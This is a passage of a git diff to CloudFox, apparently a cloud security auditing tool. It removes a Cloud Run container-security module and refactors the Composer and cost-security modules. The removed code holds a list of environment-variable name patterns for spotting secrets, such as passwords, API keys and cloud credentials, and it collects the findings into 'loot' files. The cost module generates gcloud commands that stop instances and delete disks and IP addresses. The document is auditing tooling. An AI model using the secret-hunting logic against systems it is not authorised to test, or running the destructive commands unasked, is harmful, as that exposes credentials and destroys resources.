:= []string{ - "Name", "State", "Location", "Service Account", - "Private", "Airflow URI", "Risk", "Project Name", "Project", + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Service Account", + "Private", + "Private Endpoint", + "Airflow URI", + "DAG Bucket", + "Image Version", } var body [][]string for _, env := range m.Environments { - private := "No" - if env.PrivateEnvironment { - private = "Yes" - } - sa := env.ServiceAccount if sa == "" { sa = "(default)" - } else if len(sa) > 40 { - sa = sa[:37] + "..." } airflowURI := env.AirflowURI - if len(airflowURI) > 50 { - airflowURI = airflowURI[:47] + "..." + if airflowURI == "" { + airflowURI = "-" + } + + dagBucket := env.DagGcsPrefix + if dagBucket == "" { + dagBucket = "-" + } + + imageVersion := env.ImageVersion + if imageVersion == "" { + imageVersion = "-" } body = append(body, []string{ + m.GetProjectName(env.ProjectID), + env.ProjectID, env.Name, - env.State, env.Location, + env.State, sa, - private, + boolToYesNo(env.PrivateEnvironment), + boolToYesNo(env.EnablePrivateEndpoint), airflowURI, - env.RiskLevel, - m.GetProjectName(env.ProjectID), - env.ProjectID, + dagBucket, + imageVersion, }) } @@ -181,28 +208,6 @@ func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger tables := []internal.TableFile{{Name: "composer", Header: header, Body: body}} - // High-risk environments table - var highRiskBody [][]string - for _, env := range m.Environments { - if env.RiskLevel == "HIGH" || env.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - env.Name, - env.RiskLevel, - strings.Join(env.RiskReasons, "; "), - m.GetProjectName(env.ProjectID), - env.ProjectID, - }) - } - } - - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "composer-risks", - Header: []string{"Environment", "Risk Level", "Reasons", "Project Name", "Project"}, - Body: highRiskBody, - }) - } - output := ComposerOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) diff --git a/gcp/commands/containersecurity.go b/gcp/commands/containersecurity.go deleted file mode 100644 index 6e3acb4a..00000000 --- a/gcp/commands/containersecurity.go +++ /dev/null @@ -1,827 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "sort" - "strings" - "sync" - - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" - - "google.golang.org/api/run/v1" -) - -// Module name constant -const GCP_CONTAINERSECURITY_MODULE_NAME string = "container-security" - -var GCPContainerSecurityCommand = &cobra.Command{ - Use: GCP_CONTAINERSECURITY_MODULE_NAME, - Aliases: []string{"containers", "container", "cloudrun-security"}, - Short: "Analyze container configurations for security issues", - Long: `Analyze Cloud Run and container configurations for security vulnerabilities. - -Features: -- Detects secrets in environment variables -- Analyzes container security context -- Identifies public/unauthenticated services -- Checks for privileged configurations -- Reviews ingress and network settings -- Identifies vulnerable base images (where possible) -- Analyzes service account permissions - -Security Checks: -- Secrets/credentials in env vars (API keys, passwords, tokens) -- Public ingress without authentication -- Over-permissioned service accounts -- Missing security headers -- Insecure container configurations - -Requires appropriate IAM permissions: -- roles/run.viewer -- roles/container.viewer`, - Run: runGCPContainerSecurityCommand, -} - -// ------------------------------ -// Data Structures -// ------------------------------ - -type ContainerConfig struct { - Name string - ProjectID string - Location string - ServiceType string // cloudrun, gke-pod - Image string - ServiceAccount string - Ingress string - Authentication string - EnvVarCount int - SecretEnvVars int - VPCConnector string - MinInstances int64 - MaxInstances int64 - CPU string - Memory string - Concurrency int64 - Timeout string - CreatedTime string - RiskLevel string -} - -type EnvVarSecret struct { - ServiceName string - ProjectID string - Location string - EnvVarName string - SecretType string // password, api-key, token, credential, connection-string - RiskLevel string - Details string - Remediation string -} - -type ContainerSecurityIssue struct { - ServiceName string - ProjectID string - Location string - IssueType string - Severity string - Description string - Remediation string - AffectedArea string -} - -type PublicService struct { - Name string - ProjectID string - Location string - URL string - Authentication string - Ingress string - RiskLevel string - Details string -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type ContainerSecurityModule struct { - gcpinternal.BaseGCPModule - - // Module-specific fields - Containers []ContainerConfig - EnvVarSecrets []EnvVarSecret - SecurityIssues []ContainerSecurityIssue - PublicServices []PublicService - LootMap map[string]*internal.LootFile - mu sync.Mutex - - // Tracking - totalServices int - publicCount int - secretsFound int - issuesFound int -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type ContainerSecurityOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o ContainerSecurityOutput) TableFiles() []internal.TableFile { return o.Table } -func (o ContainerSecurityOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPContainerSecurityCommand(cmd *cobra.Command, args []string) { - // Initialize command context - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_CONTAINERSECURITY_MODULE_NAME) - if err != nil { - return - } - - // Create module instance - module := &ContainerSecurityModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Containers: []ContainerConfig{}, - EnvVarSecrets: []EnvVarSecret{}, - SecurityIssues: []ContainerSecurityIssue{}, - PublicServices: []PublicService{}, - LootMap: make(map[string]*internal.LootFile), - } - - // Initialize loot files - module.initializeLootFiles() - - // Execute enumeration - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *ContainerSecurityModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Analyzing container security configurations...", GCP_CONTAINERSECURITY_MODULE_NAME) - - // Create Cloud Run client - runService, err := run.NewService(ctx) - if err != nil { - logger.ErrorM(fmt.Sprintf("Failed to create Cloud Run service: %v", err), GCP_CONTAINERSECURITY_MODULE_NAME) - return - } - - // Process each project - var wg sync.WaitGroup - for _, projectID := range m.ProjectIDs { - wg.Add(1) - go func(project string) { - defer wg.Done() - m.processProject(ctx, project, runService, logger) - }(projectID) - } - wg.Wait() - - // Check results - if m.totalServices == 0 { - logger.InfoM("No container services found", GCP_CONTAINERSECURITY_MODULE_NAME) - return - } - - logger.SuccessM(fmt.Sprintf("Analyzed %d container service(s)", m.totalServices), GCP_CONTAINERSECURITY_MODULE_NAME) - - if m.secretsFound > 0 { - logger.InfoM(fmt.Sprintf("[CRITICAL] Found %d potential secret(s) in environment variables!", m.secretsFound), GCP_CONTAINERSECURITY_MODULE_NAME) - } - - if m.publicCount > 0 { - logger.InfoM(fmt.Sprintf("[HIGH] Found %d public/unauthenticated service(s)", m.publicCount), GCP_CONTAINERSECURITY_MODULE_NAME) - } - - if m.issuesFound > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Found %d security issue(s)", m.issuesFound), GCP_CONTAINERSECURITY_MODULE_NAME) - } - - // Write output - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor -// ------------------------------ -func (m *ContainerSecurityModule) processProject(ctx context.Context, projectID string, runService *run.APIService, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Analyzing containers for project: %s", projectID), GCP_CONTAINERSECURITY_MODULE_NAME) - } - - // Analyze Cloud Run services - m.analyzeCloudRunServices(ctx, projectID, runService, logger) -} - -func (m *ContainerSecurityModule) analyzeCloudRunServices(ctx context.Context, projectID string, runService *run.APIService, logger internal.Logger) { - // List all locations - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - - services, err := runService.Projects.Locations.Services.List(parent).Do() - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_CONTAINERSECURITY_MODULE_NAME, - fmt.Sprintf("Could not enumerate Cloud Run services in project %s", projectID)) - return - } - - for _, svc := range services.Items { - m.mu.Lock() - m.totalServices++ - m.mu.Unlock() - - // Extract location from name - // Format: projects/{project}/locations/{location}/services/{name} - location := m.extractLocationFromName(svc.Metadata.Name) - serviceName := svc.Metadata.Name - - config := ContainerConfig{ - Name: m.extractServiceName(serviceName), - ProjectID: projectID, - Location: location, - ServiceType: "cloudrun", - CreatedTime: svc.Metadata.CreationTimestamp, - RiskLevel: "LOW", - } - - // Analyze spec - if svc.Spec != nil && svc.Spec.Template != nil && svc.Spec.Template.Spec != nil { - spec := svc.Spec.Template.Spec - - // Service account - config.ServiceAccount = spec.ServiceAccountName - - // Timeout - if spec.TimeoutSeconds > 0 { - config.Timeout = fmt.Sprintf("%ds", spec.TimeoutSeconds) - } - - // Concurrency - if spec.ContainerConcurrency > 0 { - config.Concurrency = spec.ContainerConcurrency - } - - // Container details - if len(spec.Containers) > 0 { - container := spec.Containers[0] - config.Image = container.Image - - // Resources - if container.Resources != nil { - if cpu, ok := container.Resources.Limits["cpu"]; ok { - config.CPU = cpu - } - if mem, ok := container.Resources.Limits["memory"]; ok { - config.Memory = mem - } - } - - // Analyze environment variables - config.EnvVarCount = len(container.Env) - m.analyzeEnvVars(container.Env, config.Name, projectID, location) - } - } - - // Analyze annotations for ingress and auth - if svc.Metadata.Annotations != nil { - // Ingress setting - if ingress, ok := svc.Metadata.Annotations["run.googleapis.com/ingress"]; ok { - config.Ingress = ingress - } else { - config.Ingress = "all" // Default - } - - // VPC connector - if vpc, ok := svc.Metadata.Annotations["run.googleapis.com/vpc-access-connector"]; ok { - config.VPCConnector = vpc - } - } - - // Check IAM policy for authentication - iamPolicy, err := runService.Projects.Locations.Services.GetIamPolicy(serviceName).Do() - if err == nil { - config.Authentication = m.analyzeIAMPolicy(iamPolicy) - } - - // Determine risk level and check for issues - m.analyzeServiceSecurity(config, svc) - - m.mu.Lock() - m.Containers = append(m.Containers, config) - m.mu.Unlock() - } -} - -func (m *ContainerSecurityModule) analyzeEnvVars(envVars []*run.EnvVar, serviceName, projectID, location string) { - // Patterns that indicate secrets - secretPatterns := map[string]string{ - "PASSWORD": "password", - "PASSWD": "password", - "SECRET": "secret", - "API_KEY": "api-key", - "APIKEY": "api-key", - "API-KEY": "api-key", - "TOKEN": "token", - "ACCESS_TOKEN": "token", - "AUTH_TOKEN": "token", - "BEARER": "token", - "CREDENTIAL": "credential", - "PRIVATE_KEY": "credential", - "PRIVATEKEY": "credential", - "CONNECTION_STRING": "connection-string", - "CONN_STR": "connection-string", - "DATABASE_URL": "connection-string", - "DB_PASSWORD": "password", - "DB_PASS": "password", - "MYSQL_PASSWORD": "password", - "POSTGRES_PASSWORD": "password", - "REDIS_PASSWORD": "password", - "MONGODB_URI": "connection-string", - "AWS_ACCESS_KEY": "credential", - "AWS_SECRET": "credential", - "AZURE_KEY": "credential", - "GCP_KEY": "credential", - "ENCRYPTION_KEY": "credential", - "SIGNING_KEY": "credential", - "JWT_SECRET": "credential", - "SESSION_SECRET": "credential", - "OAUTH": "credential", - "CLIENT_SECRET": "credential", - } - - for _, env := range envVars { - if env == nil { - continue - } - - envNameUpper := strings.ToUpper(env.Name) - - // Check if this looks like a secret - for pattern, secretType := range secretPatterns { - if strings.Contains(envNameUpper, pattern) { - // Check if it's using Secret Manager (safer) - if env.ValueFrom != nil && env.ValueFrom.SecretKeyRef != nil { - // Using Secret Manager reference - this is good - continue - } - - // Direct value - this is bad - if env.Value != "" { - secret := EnvVarSecret{ - ServiceName: serviceName, - ProjectID: projectID, - Location: location, - EnvVarName: env.Name, - SecretType: secretType, - RiskLevel: "CRITICAL", - Details: "Hardcoded secret value in environment variable", - Remediation: fmt.Sprintf("Use Secret Manager: gcloud secrets create %s --replication-policy=\"automatic\" && update Cloud Run to reference secret", strings.ToLower(env.Name)), - } - - m.mu.Lock() - m.EnvVarSecrets = append(m.EnvVarSecrets, secret) - m.secretsFound++ - m.addSecretToLoot(secret) - m.mu.Unlock() - } - break - } - } - } -} - -func (m *ContainerSecurityModule) analyzeIAMPolicy(policy *run.Policy) string { - if policy == nil || policy.Bindings == nil { - return "unknown" - } - - for _, binding := range policy.Bindings { - if binding.Role == "roles/run.invoker" { - for _, member := range binding.Members { - if member == "allUsers" { - return "public" - } - if member == "allAuthenticatedUsers" { - return "all-authenticated" - } - } - } - } - - return "authenticated" -} - -func (m *ContainerSecurityModule) analyzeServiceSecurity(config ContainerConfig, svc *run.Service) { - issues := []ContainerSecurityIssue{} - - // Check for public access - if config.Authentication == "public" { - config.RiskLevel = "HIGH" - - publicSvc := PublicService{ - Name: config.Name, - ProjectID: config.ProjectID, - Location: config.Location, - URL: svc.Status.Url, - Authentication: "public (allUsers)", - Ingress: config.Ingress, - RiskLevel: "HIGH", - Details: "Service is publicly accessible without authentication", - } - - m.mu.Lock() - m.PublicServices = append(m.PublicServices, publicSvc) - m.publicCount++ - m.mu.Unlock() - - issues = append(issues, ContainerSecurityIssue{ - ServiceName: config.Name, - ProjectID: config.ProjectID, - Location: config.Location, - IssueType: "public-access", - Severity: "HIGH", - Description: "Service allows unauthenticated access from the internet", - Remediation: "Remove allUsers from IAM policy or add authentication", - AffectedArea: "Authentication", - }) - } else if config.Authentication == "all-authenticated" { - config.RiskLevel = "MEDIUM" - - publicSvc := PublicService{ - Name: config.Name, - ProjectID: config.ProjectID, - Location: config.Location, - URL: svc.Status.Url, - Authentication: "all-authenticated", - Ingress: config.Ingress, - RiskLevel: "MEDIUM", - Details: "Service accessible to any Google account holder", - } - - m.mu.Lock() - m.PublicServices = append(m.PublicServices, publicSvc) - m.publicCount++ - m.mu.Unlock() - } - - // Check for default service account - if config.ServiceAccount == "" || strings.Contains(config.ServiceAccount, "-compute@developer.gserviceaccount.com") { - issues = append(issues, ContainerSecurityIssue{ - ServiceName: config.Name, - ProjectID: config.ProjectID, - Location: config.Location, - IssueType: "default-service-account", - Severity: "MEDIUM", - Description: "Service uses default Compute Engine service account", - Remediation: "Create a dedicated service account with minimal permissions", - AffectedArea: "IAM", - }) - } - - // Check for ingress settings - if config.Ingress == "all" && config.VPCConnector == "" { - issues = append(issues, ContainerSecurityIssue{ - ServiceName: config.Name, - ProjectID: config.ProjectID, - Location: config.Location, - IssueType: "unrestricted-ingress", - Severity: "LOW", - Description: "Service accepts traffic from all sources without VPC connector", - Remediation: "Consider using internal-only ingress or VPC connector for internal services", - AffectedArea: "Network", - }) - } - - // Check for high concurrency without scaling limits - if config.Concurrency > 80 && config.MaxInstances == 0 { - issues = append(issues, ContainerSecurityIssue{ - ServiceName: config.Name, - ProjectID: config.ProjectID, - Location: config.Location, - IssueType: "no-scaling-limits", - Severity: "LOW", - Description: "High concurrency without max instance limits could lead to cost issues", - Remediation: "Set max-instances to prevent runaway scaling", - AffectedArea: "Scaling", - }) - } - - // Check for secrets in env vars - if m.hasSecretsForService(config.Name, config.ProjectID) { - if config.RiskLevel != "HIGH" { - config.RiskLevel = "CRITICAL" - } - issues = append(issues, ContainerSecurityIssue{ - ServiceName: config.Name, - ProjectID: config.ProjectID, - Location: config.Location, - IssueType: "secrets-in-env", - Severity: "CRITICAL", - Description: "Hardcoded secrets found in environment variables", - Remediation: "Migrate secrets to Secret Manager and reference them in Cloud Run", - AffectedArea: "Secrets", - }) - } - - // Add issues - m.mu.Lock() - m.SecurityIssues = append(m.SecurityIssues, issues...) - m.issuesFound += len(issues) - m.mu.Unlock() -} - -func (m *ContainerSecurityModule) hasSecretsForService(serviceName, projectID string) bool { - for _, secret := range m.EnvVarSecrets { - if strings.Contains(secret.ServiceName, serviceName) && secret.ProjectID == projectID { - return true - } - } - return false -} - -// ------------------------------ -// Helper Functions -// ------------------------------ -func (m *ContainerSecurityModule) extractLocationFromName(name string) string { - // Format: projects/{project}/locations/{location}/services/{name} - parts := strings.Split(name, "/") - for i, part := range parts { - if part == "locations" && i+1 < len(parts) { - return parts[i+1] - } - } - return "" -} - -func (m *ContainerSecurityModule) extractServiceName(name string) string { - parts := strings.Split(name, "/") - if len(parts) > 0 { - return parts[len(parts)-1] - } - return name -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *ContainerSecurityModule) initializeLootFiles() { - m.LootMap["container-secrets"] = &internal.LootFile{ - Name: "container-secrets", - Contents: "# Secrets Found in Container Environment Variables\n# Generated by CloudFox\n# CRITICAL: These secrets should be migrated to Secret Manager!\n\n", - } - m.LootMap["vulnerable-images"] = &internal.LootFile{ - Name: "vulnerable-images", - Contents: "# Container Images Analysis\n# Generated by CloudFox\n\n", - } - m.LootMap["container-commands"] = &internal.LootFile{ - Name: "container-commands", - Contents: "# Container Security Remediation Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["public-services"] = &internal.LootFile{ - Name: "public-services", - Contents: "# Public Container Services\n# Generated by CloudFox\n\n", - } -} - -func (m *ContainerSecurityModule) addSecretToLoot(secret EnvVarSecret) { - m.LootMap["container-secrets"].Contents += fmt.Sprintf( - "## Service: %s\n"+ - "Project: %s\n"+ - "Location: %s\n"+ - "Env Var: %s\n"+ - "Type: %s\n"+ - "Risk: %s\n"+ - "Remediation: %s\n\n", - secret.ServiceName, - secret.ProjectID, - secret.Location, - secret.EnvVarName, - secret.SecretType, - secret.RiskLevel, - secret.Remediation, - ) - - // Add remediation command - m.LootMap["container-commands"].Contents += fmt.Sprintf( - "# Migrate %s secret from %s\n"+ - "# 1. Create secret in Secret Manager:\n"+ - "echo -n 'SECRET_VALUE' | gcloud secrets create %s --data-file=-\n"+ - "# 2. Update Cloud Run service to use secret:\n"+ - "gcloud run services update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", - secret.EnvVarName, m.extractServiceName(secret.ServiceName), - strings.ToLower(strings.ReplaceAll(secret.EnvVarName, "_", "-")), - m.extractServiceName(secret.ServiceName), - secret.EnvVarName, - strings.ToLower(strings.ReplaceAll(secret.EnvVarName, "_", "-")), - secret.Location, - secret.ProjectID, - ) -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort containers by risk level - sort.Slice(m.Containers, func(i, j int) bool { - riskOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} - return riskOrder[m.Containers[i].RiskLevel] < riskOrder[m.Containers[j].RiskLevel] - }) - - // Container Configs table - containersHeader := []string{ - "Service", - "Project Name", - "Project ID", - "Location", - "Image", - "Auth", - "Ingress", - "Risk", - } - - var containersBody [][]string - for _, c := range m.Containers { - containersBody = append(containersBody, []string{ - c.Name, - m.GetProjectName(c.ProjectID), - c.ProjectID, - c.Location, - truncateString(c.Image, 40), - c.Authentication, - c.Ingress, - c.RiskLevel, - }) - - // Add to images loot - m.LootMap["vulnerable-images"].Contents += fmt.Sprintf( - "%s: %s\n", - c.Name, c.Image, - ) - } - - // Env Var Secrets table - secretsHeader := []string{ - "Service", - "Project Name", - "Project ID", - "Location", - "Env Var", - "Type", - "Risk", - } - - var secretsBody [][]string - for _, s := range m.EnvVarSecrets { - secretsBody = append(secretsBody, []string{ - m.extractServiceName(s.ServiceName), - m.GetProjectName(s.ProjectID), - s.ProjectID, - s.Location, - s.EnvVarName, - s.SecretType, - s.RiskLevel, - }) - } - - // Security Issues table - issuesHeader := []string{ - "Service", - "Project Name", - "Project ID", - "Issue Type", - "Severity", - "Affected Area", - "Description", - } - - var issuesBody [][]string - for _, i := range m.SecurityIssues { - issuesBody = append(issuesBody, []string{ - i.ServiceName, - m.GetProjectName(i.ProjectID), - i.ProjectID, - i.IssueType, - i.Severity, - i.AffectedArea, - truncateString(i.Description, 40), - }) - } - - // Public Services table - publicHeader := []string{ - "Service", - "Project Name", - "Project ID", - "Location", - "URL", - "Auth", - "Risk", - } - - var publicBody [][]string - for _, p := range m.PublicServices { - publicBody = append(publicBody, []string{ - p.Name, - m.GetProjectName(p.ProjectID), - p.ProjectID, - p.Location, - truncateString(p.URL, 50), - p.Authentication, - p.RiskLevel, - }) - - // Add to public services loot - m.LootMap["public-services"].Contents += fmt.Sprintf( - "## %s\n"+ - "URL: %s\n"+ - "Auth: %s\n"+ - "Risk: %s\n"+ - "Details: %s\n\n", - p.Name, p.URL, p.Authentication, p.RiskLevel, p.Details, - ) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{} - - if len(containersBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "container-configs", - Header: containersHeader, - Body: containersBody, - }) - } - - if len(secretsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "env-var-secrets", - Header: secretsHeader, - Body: secretsBody, - }) - } - - if len(issuesBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "security-issues", - Header: issuesHeader, - Body: issuesBody, - }) - } - - if len(publicBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "public-services", - Header: publicHeader, - Body: publicBody, - }) - } - - output := ContainerSecurityOutput{ - Table: tables, - Loot: lootFiles, - } - - // Build scope names using project names - scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) - } - - // Write output - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - scopeNames, - m.ProjectIDs, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_CONTAINERSECURITY_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go index 08e974f3..cbc44526 100644 --- a/gcp/commands/costsecurity.go +++ b/gcp/commands/costsecurity.go @@ -3,7 +3,6 @@ package commands import ( "context" "fmt" - "sort" "strings" "sync" "time" @@ -24,6 +23,7 @@ const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" var GCPCostSecurityCommand = &cobra.Command{ Use: GCP_COSTSECURITY_MODULE_NAME, Aliases: []string{"cost", "cost-anomaly", "orphaned", "cryptomining"}, + Hidden: true, Short: "Identify cost anomalies, orphaned resources, and potential cryptomining activity", Long: `Analyze resources for cost-related security issues and waste. @@ -423,16 +423,17 @@ func (m *CostSecurityModule) checkCryptominingIndicators(instance *compute.Insta m.cryptoIndicators++ // Add to loot - m.LootMap["cost-anomalies"].Contents += fmt.Sprintf( - "## CRYPTOMINING INDICATOR: %s\n"+ - "Project: %s\n"+ - "Location: %s\n"+ - "Type: %s\n"+ - "Confidence: %s\n"+ - "Details: %s\n"+ - "Created: %s\n\n", - ind.Name, ind.ProjectID, ind.Location, - ind.Indicator, ind.Confidence, ind.Details, ind.CreatedTime, + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## CRYPTOMINING INDICATOR: %s (Project: %s)\n"+ + "# Location: %s | Type: %s\n"+ + "# Investigate instance:\n"+ + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "# Stop instance if suspicious:\n"+ + "gcloud compute instances stop %s --zone=%s --project=%s\n\n", + ind.Name, ind.ProjectID, + ind.Location, ind.Indicator, + ind.Name, ind.Location, ind.ProjectID, + ind.Name, ind.Location, ind.ProjectID, ) } m.mu.Unlock() @@ -499,9 +500,13 @@ func (m *CostSecurityModule) findOrphanedDisks(ctx context.Context, projectID st // Add cleanup command to loot m.mu.Lock() - m.LootMap["orphaned-resources"].Contents += fmt.Sprintf( - "%s (disk, %dGB) - %s\n# Delete: gcloud compute disks delete %s --zone=%s --project=%s\n\n", - disk.Name, disk.SizeGb, orphaned.Reason, + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## ORPHANED DISK: %s (Project: %s)\n"+ + "# Size: %dGB | Est. Cost: $%.2f/month\n"+ + "# Delete orphaned disk:\n"+ + "gcloud compute disks delete %s --zone=%s --project=%s\n\n", + disk.Name, projectID, + disk.SizeGb, estCost, disk.Name, m.extractZoneFromURL(zone), projectID, ) m.mu.Unlock() @@ -549,9 +554,13 @@ func (m *CostSecurityModule) findOrphanedIPs(ctx context.Context, projectID stri m.mu.Unlock() m.mu.Lock() - m.LootMap["orphaned-resources"].Contents += fmt.Sprintf( - "%s (static-ip, %s) - %s\n# Release: gcloud compute addresses delete %s --region=%s --project=%s\n\n", - addr.Name, addr.Address, orphaned.Reason, + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## ORPHANED IP: %s (Project: %s)\n"+ + "# Address: %s | Est. Cost: $%.2f/month\n"+ + "# Release static IP:\n"+ + "gcloud compute addresses delete %s --region=%s --project=%s\n\n", + addr.Name, projectID, + addr.Address, estCost, addr.Name, m.extractRegionFromURL(region), projectID, ) m.mu.Unlock() @@ -802,17 +811,9 @@ func (m *CostSecurityModule) estimateDiskCost(sizeGB int64, diskType string) flo // Loot File Management // ------------------------------ func (m *CostSecurityModule) initializeLootFiles() { - m.LootMap["cost-anomalies"] = &internal.LootFile{ - Name: "cost-anomalies", - Contents: "# Cost Anomalies and Potential Cryptomining\n# Generated by CloudFox\n# CRITICAL: Review these findings immediately!\n\n", - } - m.LootMap["orphaned-resources"] = &internal.LootFile{ - Name: "orphaned-resources", - Contents: "# Orphaned Resources (Cleanup Commands)\n# Generated by CloudFox\n\n", - } - m.LootMap["cleanup-commands"] = &internal.LootFile{ - Name: "cleanup-commands", - Contents: "# Resource Cleanup Commands\n# Generated by CloudFox\n# Review before executing!\n\n", + m.LootMap["cost-security-commands"] = &internal.LootFile{ + Name: "cost-security-commands", + Contents: "# Cost Security Commands\n# Generated by CloudFox\n# Review before executing!\n\n", } } @@ -820,116 +821,97 @@ func (m *CostSecurityModule) initializeLootFiles() { // Output Generation // ------------------------------ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort cryptomining indicators by confidence - sort.Slice(m.Cryptomining, func(i, j int) bool { - confOrder := map[string]int{"HIGH": 0, "MEDIUM": 1, "LOW": 2} - return confOrder[m.Cryptomining[i].Confidence] < confOrder[m.Cryptomining[j].Confidence] - }) - - // Cryptomining Indicators table - cryptoHeader := []string{ - "Resource", - "Project Name", + // Main cost-security table (combines cryptomining, orphaned, and anomalies) + mainHeader := []string{ "Project ID", + "Project Name", + "Resource", + "Type", "Location", - "Indicator", - "Confidence", - "Details", + "Issue", + "Est. Cost/Mo", } - var cryptoBody [][]string + var mainBody [][]string + + // Add cryptomining indicators for _, c := range m.Cryptomining { - cryptoBody = append(cryptoBody, []string{ - c.Name, - m.GetProjectName(c.ProjectID), + mainBody = append(mainBody, []string{ c.ProjectID, + m.GetProjectName(c.ProjectID), + c.Name, + c.ResourceType, c.Location, - c.Indicator, - c.Confidence, - truncateString(c.Details, 40), + fmt.Sprintf("cryptomining: %s", c.Indicator), + "-", }) } - // Orphaned Resources table - orphanedHeader := []string{ - "Resource", - "Project Name", - "Project ID", - "Type", - "Location", - "Size (GB)", - "Est. Cost/Mo", - "Reason", - } - - var orphanedBody [][]string + // Add orphaned resources for _, o := range m.Orphaned { - orphanedBody = append(orphanedBody, []string{ - o.Name, - m.GetProjectName(o.ProjectID), + mainBody = append(mainBody, []string{ o.ProjectID, + m.GetProjectName(o.ProjectID), + o.Name, o.ResourceType, o.Location, - fmt.Sprintf("%d", o.SizeGB), + "orphaned", fmt.Sprintf("$%.2f", o.EstCostMonth), - truncateString(o.Reason, 30), }) } - // Cost Anomalies table - anomaliesHeader := []string{ - "Resource", - "Project Name", - "Project ID", - "Type", - "Anomaly", - "Severity", - "Est. Cost/Mo", - } - - var anomaliesBody [][]string + // Add cost anomalies for _, a := range m.CostAnomalies { - anomaliesBody = append(anomaliesBody, []string{ - a.Name, - m.GetProjectName(a.ProjectID), + mainBody = append(mainBody, []string{ a.ProjectID, + m.GetProjectName(a.ProjectID), + a.Name, a.ResourceType, + a.Location, a.AnomalyType, - a.Severity, fmt.Sprintf("$%.2f", a.EstCostMonth), }) - // Add to cleanup commands loot + // Add remediation to loot if a.Remediation != "" { - m.LootMap["cleanup-commands"].Contents += fmt.Sprintf( - "# %s (%s) - %s\n%s\n\n", - a.Name, a.AnomalyType, a.Details, a.Remediation, + m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s)\n# %s\n%s\n\n", + strings.ToUpper(a.AnomalyType), a.Name, a.ProjectID, a.Details, a.Remediation, ) } } - // Expensive Resources table + // Expensive Resources table (keep separate due to different structure) expensiveHeader := []string{ - "Resource", - "Project Name", "Project ID", + "Project Name", + "Resource", + "Location", "Machine Type", "vCPUs", "Memory GB", "GPUs", + "Labeled", "Est. Cost/Mo", } var expensiveBody [][]string for _, e := range m.Expensive { + labeled := "No" + if len(e.Labels) > 0 { + labeled = "Yes" + } + expensiveBody = append(expensiveBody, []string{ - e.Name, - m.GetProjectName(e.ProjectID), e.ProjectID, + m.GetProjectName(e.ProjectID), + e.Name, + e.Location, e.MachineType, fmt.Sprintf("%d", e.VCPUs), fmt.Sprintf("%.1f", e.MemoryGB), fmt.Sprintf("%d", e.GPUs), + labeled, fmt.Sprintf("$%.2f", e.EstCostMonth), }) } @@ -937,7 +919,7 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Review before executing!\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -945,33 +927,17 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo // Build tables tables := []internal.TableFile{} - if len(cryptoBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "cryptomining-indicators", - Header: cryptoHeader, - Body: cryptoBody, - }) - } - - if len(orphanedBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "orphaned-resources", - Header: orphanedHeader, - Body: orphanedBody, - }) - } - - if len(anomaliesBody) > 0 { + if len(mainBody) > 0 { tables = 